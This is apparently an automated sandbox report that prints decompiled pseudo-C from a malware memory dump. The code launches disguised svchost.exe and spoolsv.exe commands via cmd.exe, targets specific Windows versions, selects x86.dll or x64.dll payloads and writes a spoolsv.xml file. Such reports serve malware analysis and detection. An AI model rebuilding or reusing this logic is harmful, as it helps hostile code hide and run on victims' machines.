                                                			E02FA7720(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                				signed int _v8;
                                                				char _v268;
                                                				char _v528;
                                                				char _v788;
                                                				char _v1048;
                                                				char _v1308;
                                                				char _v1568;
                                                				signed int _t26;
                                                				signed int _t56;
                                                				signed int _t65;
                                                				void* _t77;
                                                				void* _t99;
                                                				void** _t101;
                                                				void* _t102;
                                                				void* _t103;
                                                				void* _t104;
                                                				signed int _t105;
                                                				void* _t106;
                                                				void* _t109;
                                                				void* _t110;
                                                				void* _t111;
                                                				void* _t112;
                                                
                                                				_t100 = __esi;
                                                				_t26 =  *0x2fcf008; // 0x93ad1eea
                                                				_v8 = _t26 ^ _t105;
                                                				_t99 = __edx;
                                                				_t77 = __ecx;
                                                				E02FB3440(__edx,  &_v1048, 0, 0x104);
                                                				GetSystemDirectoryA( &_v1048, 0x104);
                                                				E02FB3440(_t99,  &_v268, 0, 0x104);
                                                				E02FB3440(_t99,  &_v788, 0, 0x104);
                                                				E02FB3440(_t99,  &_v1308, 0, 0x104);
                                                				E02FB3440(_t99,  &_v1568, 0, 0x104);
                                                				E02FB3440(_t99,  &_v528, 0, 0x104);
                                                				E02FA5180( &_v268, 0x104, "%s\\process1.txt", _t99);
                                                				E02FA5180( &_v788, 0x104, "%s\\process2.txt", _t99);
                                                				_push( &_v268);
                                                				E02FA5180( &_v1308, 0x104, "/c %s\\svchost.exe > %s", _t99);
                                                				_push( &_v788);
                                                				E02FA5180( &_v1568, 0x104, "/c %s\\spoolsv.exe > %s", _t99);
                                                				E02FA5180( &_v528, 0x104, "%s\\cmd.exe",  &_v1048);
                                                				_t109 = _t106 + 0xa0;
                                                				if(E02FA71E0(_t99, _t99) != 0) {
                                                					_t56 = E02FA72D0(_t77, _t99, _t77, _t99, "WIN72K8R2");
                                                					_t110 = _t109 + 4;
                                                					__eflags = _t56;
                                                					if(__eflags == 0) {
                                                						goto L1;
                                                					} else {
                                                						_push(__esi);
                                                						while(1) {
                                                							_t101 = E02FA4F50( &_v528,  &_v1308, __eflags, _t99);
                                                							_t111 = _t110 + 4;
                                                							__eflags = _t101;
                                                							if(_t101 == 0) {
                                                								break;
                                                							}
                                                							WaitForSingleObject( *_t101, 0x2bf20);
                                                							_push(0x10);
                                                							E02FB0AA1(_t101);
                                                							_t112 = _t111 + 8;
                                                							_t65 = E02FA75E0( &_v268);
                                                							__eflags = _t65;
                                                							if(_t65 != 0) {
                                                								__eflags = _t65 == 1;
                                                								if(_t65 == 1) {
                                                									break;
                                                								} else {
                                                									__eflags = E02FA73E0(_t77,  &_v268, _t99, _t99, _t101, _t77);
                                                									if(__eflags == 0) {
                                                										break;
                                                									} else {
                                                										__eflags = E02FA4FD0( &_v1568, __eflags, _t99);
                                                										if(__eflags == 0) {
                                                											break;
                                                										} else {
                                                											_t103 = E02FB0AB4(_t101, __eflags);
                                                											E02FB3440(_t99, _t103, 0, 0x80);
                                                											E02FB5C70(_t103, 0x80, _t77);
                                                											CreateThread(0, 0, E02FA7980, _t103, 0, 0);
                                                											Sleep(0x32);
                                                											_t104 = 0x80;
                                                											__eflags = _v8 ^ _t105;
                                                											return E02FB0A5D(_v8 ^ _t105, _t104);
                                                										}
                                                									}
                                                								}
                                                							} else {
                                                								E02FA72D0(_t77, _t99, _t77, _t99, "XP");
                                                								_t110 = _t112 + 4;
                                                								continue;
                                                							}
                                                							goto L12;
                                                						}
                                                						_pop(_t102);
                                                						__eflags = _v8 ^ _t105;
                                                						return E02FB0A5D(_v8 ^ _t105, _t102);
                                                					}
                                                				} else {
                                                					L1:
                                                					return E02FB0A5D(_v8 ^ _t105, _t100);
                                                				}
                                                				L12:
                                                			}

                                                APIs
                                                • GetSystemDirectoryA.KERNEL32 ref: 02FA775B
                                                • WaitForSingleObject.KERNEL32(00000000,0002BF20,00000000), ref: 02FA78A6
                                                • CreateThread.KERNEL32(00000000,00000000,02FA7980,00000000,00000000,00000000), ref: 02FA7947
                                                • Sleep.KERNEL32(00000032), ref: 02FA794F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: CreateDirectoryObjectSingleSleepSystemThreadWait
                                                • String ID: %s\cmd.exe$%s\process1.txt$%s\process2.txt$/c %s\spoolsv.exe > %s$/c %s\svchost.exe > %s$WIN72K8R2
                                                • API String ID: 3526521245-665225228
                                                • Opcode ID: 0a7bd09a7c078635a8732d542c1b3df70e1781c29d914418c849593647254f5f
                                                • Instruction ID: a4b568a50ddcc6de90aae67c6667238afdeec3c0cae5e9ce89604db1806a86c0
                                                • Opcode Fuzzy Hash: 0a7bd09a7c078635a8732d542c1b3df70e1781c29d914418c849593647254f5f
                                                • Instruction Fuzzy Hash: A9511BF1E8020C77EB20F6609C55FEEB36DAF45B94F5000A5F749A7180DAB0AA858F51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 74%
                                                			E02FA73E0(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr _a4) {
                                                				signed int _v8;
                                                				char _v268;
                                                				char _v528;
                                                				char _v788;
                                                				void _v103188;
                                                				long _v103192;
                                                				void* _v103196;
                                                				signed int _t29;
                                                				void* _t43;
                                                				char* _t44;
                                                				intOrPtr _t51;
                                                				int _t58;
                                                				void* _t69;
                                                				void* _t76;
                                                				intOrPtr _t88;
                                                				void* _t89;
                                                				void* _t95;
                                                				intOrPtr* _t96;
                                                				long _t97;
                                                				void* _t98;
                                                				void* _t99;
                                                				void* _t100;
                                                				signed int _t101;
                                                
                                                				E02FC3CA0();
                                                				_t29 =  *0x2fcf008; // 0x93ad1eea
                                                				_v8 = _t29 ^ _t101;
                                                				_t88 = _a4;
                                                				_t69 = __edx;
                                                				_v103196 = 0;
                                                				_v103192 = 0;
                                                				if(E02FA4E60(__ecx,  &_v103196,  &_v103192) != 0) {
                                                					_push(__esi);
                                                					E02FB3440(_t88,  &_v528, 0, 0x104);
                                                					E02FB3440(_t88,  &_v268, 0, 0x104);
                                                					E02FA5180( &_v528, 0x104, "%s\\x86.dll", _t69);
                                                					E02FA5180( &_v268, 0x104, "%s\\x64.dll", _t69);
                                                					E02FB3440(_t88,  &_v103188, 0, 0x19000);
                                                					_t95 = _v103196;
                                                					_t43 = E02FA76A0(_t95);
                                                					if(_t43 == 0x20) {
                                                						_t44 =  &_v528;
                                                						goto L9;
                                                					} else {
                                                						if(_t43 == 0x40) {
                                                							_t44 =  &_v268;
                                                							L9:
                                                							_push(_t44);
                                                							E02FA5180( &_v103188, 0x19000,  *0x2fd6834, _t88);
                                                							if(_t95 != 0) {
                                                								LocalFree(_t95);
                                                							}
                                                							E02FB3440(_t88,  &_v788, 0, 0x104);
                                                							E02FA5180( &_v788, 0x104, "%s\\spoolsv.xml", _t69);
                                                							_t96 =  &_v103188;
                                                							_t76 = _t96 + 1;
                                                							do {
                                                								_t51 =  *_t96;
                                                								_t96 = _t96 + 1;
                                                							} while (_t51 != 0);
                                                							_v103192 = 0;
                                                							_t97 = _t96 - _t76;
                                                							_t89 = CreateFileA( &_v788, 0x40000000, 2, 0, 2, 0x80, 0);
                                                							if(_t89 == 0) {
                                                								goto L6;
                                                							} else {
                                                								_t58 = WriteFile(_t89,  &_v103188, _t97,  &_v103192, 0);
                                                								_push(_t89);
                                                								if(_t58 != 0) {
                                                									CloseHandle();
                                                									_pop(_t99);
                                                									return E02FB0A5D(_v8 ^ _t101, _t99);
                                                								} else {
                                                									CloseHandle();
                                                									_pop(_t100);
                                                									return E02FB0A5D(_v8 ^ _t101, _t100);
                                                								}
                                                							}
                                                						} else {
                                                							if(_t95 != 0) {
                                                								LocalFree(_t95);
                                                							}
                                                							L6:
                                                							_pop(_t98);
                                                							return E02FB0A5D(_v8 ^ _t101, _t98);
                                                						}
                                                					}
                                                				} else {
                                                					return E02FB0A5D(_v8 ^ _t101, __esi);
                                                				}
                                                			}

                                                APIs
                                                  • Part of subcall function 02FA4E60: CreateFileA.KERNEL32(C:\Windows\system32\msvcwme.log,80000000,00000001,00000000,00000003,00000080,00000000,?,73B76490), ref: 02FA4E81
                                                  • Part of subcall function 02FA4E60: GetFileSizeEx.KERNEL32(00000000,00000000,?,73B76490), ref: 02FA4EA1
                                                  • Part of subcall function 02FA4E60: LocalAlloc.KERNEL32(00000040,00000001,?,73B76490), ref: 02FA4EB3
                                                  • Part of subcall function 02FA4E60: CloseHandle.KERNEL32(00000000,?,73B76490), ref: 02FA4ECF
                                                • LocalFree.KERNEL32(?), ref: 02FA74C2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: FileLocal$AllocCloseCreateFreeHandleSize
                                                • String ID: %s\spoolsv.xml$%s\x64.dll$%s\x86.dll
                                                • API String ID: 1503672127-2651032631
                                                • Opcode ID: 548e500ebf55fb037fb3b625f4cd0ae0e3a0ec9d48eb94c60e16d4915c4890bf
                                                • Instruction ID: 697b214bc505b8e91457f4e9eefa15664ddeaa6ce0419a5b4ccbd4b6a2191c76
                                                • Opcode Fuzzy Hash: 548e500ebf55fb037fb3b625f4cd0ae0e3a0ec9d48eb94c60e16d4915c4890bf
                                                • Instruction Fuzzy Hash: 8751E8B1E4021CABDB20EB50DD55FEEF36DAF05794F5004E5EA19A7180DB70A7848FA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 71%
                                                			E02FA4E60(CHAR* __ecx, void** __edx, struct _OVERLAPPED** _a4) {
                                                				void** _v12;
                                                				long _v16;
                                                				long _v20;
                                                				struct _OVERLAPPED* _v28;
                                                				struct _OVERLAPPED* _v32;
                                                				void* __edi;
                                                				struct _OVERLAPPED* _t19;
                                                				void** _t22;
                                                				long _t29;
                                                				void* _t31;
                                                				long _t33;
                                                				void** _t36;
                                                				struct _OVERLAPPED** _t37;
                                                				long _t40;
                                                
                                                				_t36 = __edx;
                                                				_v12 = __edx;
                                                				_t31 = CreateFileA(__ecx, 0x80000000, 1, 0, 3, 0x80, 0);
                                                				if(_t31 == 0xffffffff) {
                                                					L3:
                                                					return 0;
                                                				} else {
                                                					_v32 = 0;
                                                					_v28 = 0;
                                                					__imp__GetFileSizeEx(_t31,  &_v32);
                                                					_t19 = _v32;
                                                					_v20 = _t19;
                                                					_t7 =  &(_t19->Internal); // 0x1
                                                					_t39 = _t7;
                                                					 *_t36 = LocalAlloc(0x40, _t7);
                                                					E02FB3440(_t36, _t20, 0, _t39);
                                                					_t22 = _t36;
                                                					if( *_t22 != 0) {
                                                						_t37 = _a4;
                                                						_t33 = _v20;
                                                						_t40 = _t33;
                                                						 *_t37 = 0;
                                                						if(_t33 > 0) {
                                                							while(1) {
                                                								_v16 = 0;
                                                								ReadFile(_t31,  *_t22, _t40,  &_v16, 0);
                                                								_t29 = _v16;
                                                								if(_t29 == 0) {
                                                									break;
                                                								}
                                                								 *_t37 =  *_t37 + _t29;
                                                								_t40 = _t40 - _t29;
                                                								_t22 = _v12;
                                                								if(_t40 > 0) {
                                                									continue;
                                                								}
                                                								break;
                                                							}
                                                							_t33 = _v20;
                                                						}
                                                						_push(_t31);
                                                						if( *_t37 == _t33) {
                                                							CloseHandle();
                                                							return 1;
                                                						} else {
                                                							CloseHandle();
                                                							LocalFree( *_v12);
                                                							return 0;
                                                						}
                                                					} else {
                                                						CloseHandle(_t31);
                                                						goto L3;
                                                					}
                                                				}
                                                			}

                                                APIs
                                                • CreateFileA.KERNEL32(C:\Windows\system32\msvcwme.log,80000000,00000001,00000000,00000003,00000080,00000000,?,73B76490), ref: 02FA4E81
                                                • GetFileSizeEx.KERNEL32(00000000,00000000,?,73B76490), ref: 02FA4EA1
                                                • LocalAlloc.KERNEL32(00000040,00000001,?,73B76490), ref: 02FA4EB3
                                                • CloseHandle.KERNEL32(00000000,?,73B76490), ref: 02FA4ECF
                                                • ReadFile.KERNEL32(00000000,?,00000000,?,00000000,?,73B76490), ref: 02FA4F01
                                                • CloseHandle.KERNEL32(00000000,?,73B76490), ref: 02FA4F21
                                                • LocalFree.KERNEL32(?,?,73B76490), ref: 02FA4F2C
                                                • CloseHandle.KERNEL32(00000000,?,73B76490), ref: 02FA4F3B
                                                Strings
                                                • C:\Windows\system32\msvcwme.log, xrefs: 02FA4E7D
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: CloseFileHandle$Local$AllocCreateFreeReadSize
                                                • String ID: C:\Windows\system32\msvcwme.log
                                                • API String ID: 47662278-2357825738
                                                • Opcode ID: dbda322258f9945b6656bfea665b5a682980d1d504d9f821dd5f9678db71e311
                                                • Instruction ID: 75fbf0544eaaa063f8d4bdecebdda9507bab8b3330b25f8ad77089541e4decfc
                                                • Opcode Fuzzy Hash: dbda322258f9945b6656bfea665b5a682980d1d504d9f821dd5f9678db71e311
                                                • Instruction Fuzzy Hash: A031A7B5E40219AFEB108FA9DC49BAFBBB8EF48361F100155FA05A7380D7B06410CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 83%
                                                			E02FC1A09(void* __ebx, void* __edi, int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16, short* _a20, char* _a24, int _a28, int _a32) {
                                                				signed int _v8;
                                                				char _v22;
                                                				struct _cpinfo _v28;
                                                				short* _v32;
                                                				int _v36;
                                                				char* _v40;
                                                				int _v44;
                                                				intOrPtr _v48;
                                                				void* _v60;
                                                				void* __esi;
                                                				signed int _t63;
                                                				int _t70;
                                                				signed int _t72;
                                                				short* _t73;
                                                				signed int _t77;
                                                				short* _t87;
                                                				void* _t89;
                                                				void* _t92;
                                                				int _t99;
                                                				short _t101;
                                                				intOrPtr _t102;
                                                				signed int _t112;
                                                				char* _t114;
                                                				char* _t115;
                                                				void* _t120;
                                                				void* _t121;
                                                				intOrPtr _t122;
                                                				intOrPtr _t123;
                                                				intOrPtr* _t125;
                                                				short* _t126;
                                                				short* _t127;
                                                				signed int _t128;
                                                				short* _t129;
                                                
                                                				_t63 =  *0x2fcf008; // 0x93ad1eea
                                                				_v8 = _t63 ^ _t128;
                                                				_t127 = _a20;
                                                				_v44 = _a4;
                                                				_v48 = _a8;
                                                				_t67 = _a24;
                                                				_v40 = _a24;
                                                				_t125 = _a16;
                                                				_v36 = _t125;
                                                				if(_t127 <= 0) {
                                                					if(_t127 >= 0xffffffff) {
                                                						goto L2;
                                                					} else {
                                                						goto L5;
                                                					}
                                                				} else {
                                                					_t127 = E02FC002B(_t125, _t127);
                                                					_t67 = _v40;
                                                					L2:
                                                					_t99 = _a28;
                                                					if(_t99 <= 0) {
                                                						if(_t99 < 0xffffffff) {
                                                							goto L5;
                                                						} else {
                                                							goto L7;
                                                						}
                                                					} else {
                                                						_t99 = E02FC002B(_t67, _t99);
                                                						L7:
                                                						_t70 = _a32;
                                                						if(_t70 == 0) {
                                                							_t70 =  *( *_v44 + 8);
                                                							_a32 = _t70;
                                                						}
                                                						if(_t127 == 0 || _t99 == 0) {
                                                							if(_t127 != _t99) {
                                                								if(_t99 <= 1) {
                                                									if(_t127 <= 1) {
                                                										if(GetCPInfo(_t70,  &_v28) == 0) {
                                                											goto L5;
                                                										} else {
                                                											if(_t127 <= 0) {
                                                												if(_t99 <= 0) {
                                                													goto L36;
                                                												} else {
                                                													_t89 = 2;
                                                													if(_v28 >= _t89) {
                                                														_t114 =  &_v22;
                                                														if(_v22 != 0) {
                                                															_t127 = _v40;
                                                															while(1) {
                                                																_t122 =  *((intOrPtr*)(_t114 + 1));
                                                																if(_t122 == 0) {
                                                																	goto L15;
                                                																}
                                                																_t101 =  *_t127;
                                                																if(_t101 <  *_t114 || _t101 > _t122) {
                                                																	_t114 = _t114 + _t89;
                                                																	if( *_t114 != 0) {
                                                																		continue;
                                                																	} else {
                                                																		goto L15;
                                                																	}
                                                																}
                                                																goto L63;
                                                															}
                                                														}
                                                													}
                                                													goto L15;
                                                												}
                                                											} else {
                                                												_t92 = 2;
                                                												if(_v28 >= _t92) {
                                                													_t115 =  &_v22;
                                                													if(_v22 != 0) {
                                                														while(1) {
                                                															_t123 =  *((intOrPtr*)(_t115 + 1));
                                                															if(_t123 == 0) {
                                                																goto L17;
                                                															}
                                                															_t102 =  *_t125;
                                                															if(_t102 <  *_t115 || _t102 > _t123) {
                                                																_t115 = _t115 + _t92;
                                                																if( *_t115 != 0) {
                                                																	continue;
                                                																} else {
                                                																	goto L17;
                                                																}
                                                															}
                                                															goto L63;
                                                														}
                                                													}
                                                												}
                                                												goto L17;
                                                											}
                                                										}
                                                									} else {
                                                										L17:
                                                										_push(3);
                                                										goto L13;
                                                									}
                                                								} else {
                                                									L15:
                                                								}
                                                							} else {
                                                								_push(2);
                                                								L13:
                                                							}
                                                						} else {
                                                							L36:
                                                							_t126 = 0;
                                                							_t72 = MultiByteToWideChar(_a32, 9, _v36, _t127, 0, 0);
                                                							_v44 = _t72;
                                                							if(_t72 == 0) {
                                                								L5:
                                                							} else {
                                                								_t120 = _t72 + _t72;
                                                								asm("sbb eax, eax");
                                                								if((_t120 + 0x00000008 & _t72) == 0) {
                                                									_t73 = 0;
                                                									_v32 = 0;
                                                									goto L45;
                                                								} else {
                                                									asm("sbb eax, eax");
                                                									_t85 = _t72 & _t120 + 0x00000008;
                                                									_t112 = _t120 + 8;
                                                									if((_t72 & _t120 + 0x00000008) > 0x400) {
                                                										asm("sbb eax, eax");
                                                										_t87 = E02FB7882(_t112, _t85 & _t112);
                                                										_v32 = _t87;
                                                										if(_t87 == 0) {
                                                											goto L61;
                                                										} else {
                                                											 *_t87 = 0xdddd;
                                                											goto L43;
                                                										}
                                                									} else {
                                                										asm("sbb eax, eax");
                                                										E02FC3C70();
                                                										_t87 = _t129;
                                                										_v32 = _t87;
                                                										if(_t87 == 0) {
                                                											L61:
                                                											_t100 = _v32;
                                                										} else {
                                                											 *_t87 = 0xcccc;
                                                											L43:
                                                											_t73 =  &(_t87[4]);
                                                											_v32 = _t73;
                                                											L45:
                                                											if(_t73 == 0) {
                                                												goto L61;
                                                											} else {
                                                												_t127 = _a32;
                                                												if(MultiByteToWideChar(_t127, 1, _v36, _t127, _t73, _v44) == 0) {
                                                													goto L61;
                                                												} else {
                                                													_t77 = MultiByteToWideChar(_t127, 9, _v40, _t99, _t126, _t126);
                                                													_v36 = _t77;
                                                													if(_t77 == 0) {
                                                														goto L61;
                                                													} else {
                                                														_t121 = _t77 + _t77;
                                                														_t108 = _t121 + 8;
                                                														asm("sbb eax, eax");
                                                														if((_t121 + 0x00000008 & _t77) == 0) {
                                                															_t127 = _t126;
                                                															goto L56;
                                                														} else {
                                                															asm("sbb eax, eax");
                                                															_t81 = _t77 & _t121 + 0x00000008;
                                                															_t108 = _t121 + 8;
                                                															if((_t77 & _t121 + 0x00000008) > 0x400) {
                                                																asm("sbb eax, eax");
                                                																_t127 = E02FB7882(_t108, _t81 & _t108);
                                                																_pop(_t108);
                                                																if(_t127 == 0) {
                                                																	goto L59;
                                                																} else {
                                                																	 *_t127 = 0xdddd;
                                                																	goto L54;
                                                																}
                                                															} else {
                                                																asm("sbb eax, eax");
                                                																E02FC3C70();
                                                																_t127 = _t129;
                                                																if(_t127 == 0) {
                                                																	L59:
                                                																	_t100 = _v32;
                                                																} else {
                                                																	 *_t127 = 0xcccc;
                                                																	L54:
                                                																	_t127 =  &(_t127[4]);
                                                																	L56:
                                                																	if(_t127 == 0 || MultiByteToWideChar(_a32, 1, _v40, _t99, _t127, _v36) == 0) {
                                                																		goto L59;
                                                																	} else {
                                                																		_t100 = _v32;
                                                																		_t126 = E02FB7DA7(_t108, _v48, _a12, _v32, _v44, _t127, _v36, _t126, _t126, _t126);
                                                																	}
                                                																}
                                                															}
                                                														}
                                                														E02FBA677(_t127);
                                                													}
                                                												}
                                                											}
                                                										}
                                                									}
                                                								}
                                                								E02FBA677(_t100);
                                                							}
                                                						}
                                                					}
                                                				}
                                                				L63:
                                                				return E02FB0A5D(_v8 ^ _t128, _t127);
                                                			}




































                                                0x02fc1c85
                                                0x02fc1c85
                                                0x02fc1c25
                                                0x02fc1c25
                                                0x02fc1c46
                                                0x02fc1c46
                                                0x02fc1c4d
                                                0x02fc1c4f
                                                0x00000000
                                                0x02fc1c68
                                                0x02fc1c68
                                                0x02fc1c81
                                                0x02fc1c81
                                                0x02fc1c4f
                                                0x02fc1c23
                                                0x02fc1c12
                                                0x02fc1c89
                                                0x02fc1c8e
                                                0x02fc1bed
                                                0x02fc1bd3
                                                0x02fc1bb7
                                                0x02fc1b7c
                                                0x02fc1b68
                                                0x02fc1c95
                                                0x02fc1c9b
                                                0x02fc1b43
                                                0x02fc1a84
                                                0x02fc1a50
                                                0x02fc1c9d
                                                0x02fc1cb0

                                                APIs
                                                • GetCPInfo.KERNEL32(?,?,?,7FFFFFFF,?,?,02FC1CE2,?,?,?,?,?,?,?,?,?), ref: 02FC1AB5
                                                • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000,?,02FC1CE2,?,?,?,?,?,?,?,?), ref: 02FC1B38
                                                • __alloca_probe_16.LIBCMT ref: 02FC1B70
                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,02FC1CE2,?,02FC1CE2,?,?,?,?,?,?,?,?), ref: 02FC1BCB
                                                • __alloca_probe_16.LIBCMT ref: 02FC1C1A
                                                • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000,?,02FC1CE2,?,?,?,?,?,?,?,?), ref: 02FC1BE2
                                                  • Part of subcall function 02FB7882: RtlAllocateHeap.NTDLL(00000000,77109EB0,00000000,?,02FB0A9A,77109EB0,?,02FA9C60,00000100,?,77109EB0), ref: 02FB78B4
                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,02FC1CE2,?,?,?,?,?,?,?,?), ref: 02FC1C5E
                                                • __freea.LIBCMT ref: 02FC1C89
                                                • __freea.LIBCMT ref: 02FC1C95
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                                • String ID:
                                                • API String ID: 201697637-0
                                                • Opcode ID: 54e07a4f4fe6c3d99819f3a0339c4602d107c8864cf671aa7357b8dba93cd8bb
                                                • Instruction ID: e125390cd8c8f0f2e81515320964b278db3f327aef1833bc92cdec441faa6977
                                                • Opcode Fuzzy Hash: 54e07a4f4fe6c3d99819f3a0339c4602d107c8864cf671aa7357b8dba93cd8bb
                                                • Instruction Fuzzy Hash: F191C672E002179EDB24CE64CE80AFFBBB5AF09794F24455DEA09E7142EB35D854CB60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 90%
                                                			E02FA8BB0(void* __ebx, intOrPtr* __ecx, void* __edi, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12) {
                                                				long _v8;
                                                				char _v16;
                                                				signed int _v20;
                                                				char _v24;
                                                				char _v28;
                                                				void* _v32;
                                                				struct _CRITICAL_SECTION _v56;
                                                				long _v60;
                                                				long _v64;
                                                				void* _v68;
                                                				char _v72;
                                                				long _v76;
                                                				void* __esi;
                                                				signed int _t63;
                                                				signed int _t64;
                                                				void* _t67;
                                                				void* _t75;
                                                				void* _t82;
                                                				void* _t90;
                                                				void* _t92;
                                                				void* _t95;
                                                				void* _t98;
                                                				void* _t100;
                                                				intOrPtr* _t112;
                                                				void* _t113;
                                                				void* _t115;
                                                				intOrPtr _t117;
                                                				intOrPtr* _t124;
                                                				signed char* _t135;
                                                				intOrPtr* _t139;
                                                				intOrPtr _t142;
                                                				void* _t146;
                                                				struct _CRITICAL_SECTION* _t147;
                                                				signed int _t148;
                                                				void* _t149;
                                                				void* _t150;
                                                				void* _t151;
                                                
                                                				_push(0xffffffff);
                                                				_push(E02FC4728);
                                                				_push( *[fs:0x0]);
                                                				_t150 = _t149 - 0x3c;
                                                				_t63 =  *0x2fcf008; // 0x93ad1eea
                                                				_t64 = _t63 ^ _t148;
                                                				_v20 = _t64;
                                                				_push(_t64);
                                                				 *[fs:0x0] =  &_v16;
                                                				_t145 = __ecx;
                                                				_t117 = _a12;
                                                				_t142 = _a4;
                                                				_t139 = _a8;
                                                				if(_t117 != 0) {
                                                					__eflags = _t117 - 5;
                                                					if(_t117 != 5) {
                                                						L5:
                                                						E02FA8690(_t142, _t139, _t117);
                                                						_t67 = E02FA87A0(_t142);
                                                						__eflags = _t67 - 0xd;
                                                						if(_t67 > 0xd) {
                                                							while(1) {
                                                								_t112 =  *((intOrPtr*)(_t142 + 4));
                                                								_t124 =  &_v28;
                                                								_v28 =  *_t112;
                                                								_v24 =  *((intOrPtr*)(_t112 + 4));
                                                								__eflags =  *((intOrPtr*)(_t145 + 0x214)) -  *_t124;
                                                								if( *((intOrPtr*)(_t145 + 0x214)) !=  *_t124) {
                                                									break;
                                                								}
                                                								__eflags = ( *(_t145 + 0x218) & 0x000000ff) -  *((intOrPtr*)(_t124 + 4));
                                                								if(( *(_t145 + 0x218) & 0x000000ff) !=  *((intOrPtr*)(_t124 + 4))) {
                                                									break;
                                                								} else {
                                                									_t113 =  *(_t112 + 5);
                                                									_v32 = _t113;
                                                									__eflags = _t113;
                                                									if(_t113 != 0) {
                                                										_t126 = _t142;
                                                										_t75 = E02FA87A0(_t142);
                                                										__eflags = _t75 - _t113;
                                                										if(_t75 >= _t113) {
                                                											_v76 = 0;
                                                											E02FA8700(_t126,  &_v28, 5);
                                                											E02FA8700(_t142,  &_v32, 4);
                                                											E02FA8700(_t142,  &_v76, 4);
                                                											_t115 = _v32 + 0xfffffff3;
                                                											_push(_t115);
                                                											_t82 = E02FB0AB4(_t145, __eflags);
                                                											_t151 = _t150 + 4;
                                                											_v32 = _t82;
                                                											E02FA8700(_t142, _t82, _t115);
                                                											_v72 = 0x2fccab8;
                                                											_v60 = 0;
                                                											_v68 = 0;
                                                											_v64 = 0;
                                                											InitializeCriticalSection( &_v56);
                                                											_v8 = 0;
                                                											EnterCriticalSection( &_v56);
                                                											_v64 = _v68;
                                                											E02FA8840( &_v72, 0x400);
                                                											LeaveCriticalSection( &_v56);
                                                											EnterCriticalSection( &_v56);
                                                											_t90 = _v68;
                                                											__eflags = _t90;
                                                											_t133 =  ==  ? 0 : _v64 - _t90;
                                                											_t92 = E02FA87B0( &_v72, ( ==  ? 0 : _v64 - _t90) + _t115);
                                                											__eflags = _t92 - 0xffffffff;
                                                											if(_t92 != 0xffffffff) {
                                                												E02FC3DB0(_v64, _v32, _t115);
                                                												_t151 = _t151 + 0xc;
                                                												_t44 =  &_v64;
                                                												 *_t44 = _v64 + _t115;
                                                												__eflags =  *_t44;
                                                											}
                                                											LeaveCriticalSection( &_v56);
                                                											_t135 = _v68;
                                                											_t95 = ( *_t135 & 0x000000ff) - 0x34;
                                                											__eflags = _t95;
                                                											if(_t95 == 0) {
                                                												L16:
                                                												E02FA88D0(_t145);
                                                											} else {
                                                												__eflags = _t95 == 1;
                                                												if(_t95 == 1) {
                                                													 *(_t145 + 0xc) = _t135[8];
                                                													 *(_t145 + 8) = _t135[4];
                                                													goto L16;
                                                												}
                                                											}
                                                											E02FB0AAF(_v32);
                                                											_v8 = 0xffffffff;
                                                											_t150 = _t151 + 4;
                                                											_t98 = _v68;
                                                											_v72 = 0x2fccab8;
                                                											__eflags = _t98;
                                                											if(_t98 != 0) {
                                                												VirtualFree(_t98, 0, 0x8000);
                                                											}
                                                											DeleteCriticalSection( &_v56);
                                                											_t100 = E02FA87A0(_t142);
                                                											__eflags = _t100 - 0xd;
                                                											if(_t100 > 0xd) {
                                                												continue;
                                                											} else {
                                                											}
                                                										}
                                                									}
                                                								}
                                                								goto L22;
                                                							}
                                                							_t147 = _t142 + 0x10;
                                                							EnterCriticalSection(_t147);
                                                							 *((intOrPtr*)(_t142 + 8)) =  *((intOrPtr*)(_t142 + 4));
                                                							E02FA8840(_t142, 0x400);
                                                							LeaveCriticalSection(_t147);
                                                						}
                                                					} else {
                                                						__eflags =  *_t139 -  *((intOrPtr*)(__ecx + 0x214));
                                                						if( *_t139 !=  *((intOrPtr*)(__ecx + 0x214))) {
                                                							goto L5;
                                                						} else {
                                                							__eflags = ( *(_t139 + 4) & 0x000000ff) -  *((intOrPtr*)(__ecx + 0x218));
                                                							if(( *(_t139 + 4) & 0x000000ff) !=  *((intOrPtr*)(__ecx + 0x218))) {
                                                								goto L5;
                                                							}
                                                						}
                                                					}
                                                				} else {
                                                					 *((intOrPtr*)( *((intOrPtr*)( *__ecx)) + 0x18))();
                                                				}
                                                				L22:
                                                				 *[fs:0x0] = _v16;
                                                				_pop(_t146);
                                                				return E02FB0A5D(_v20 ^ _t148, _t146);
                                                			}









































                                                APIs
                                                • InitializeCriticalSection.KERNEL32(?,00000000), ref: 02FA8CE3
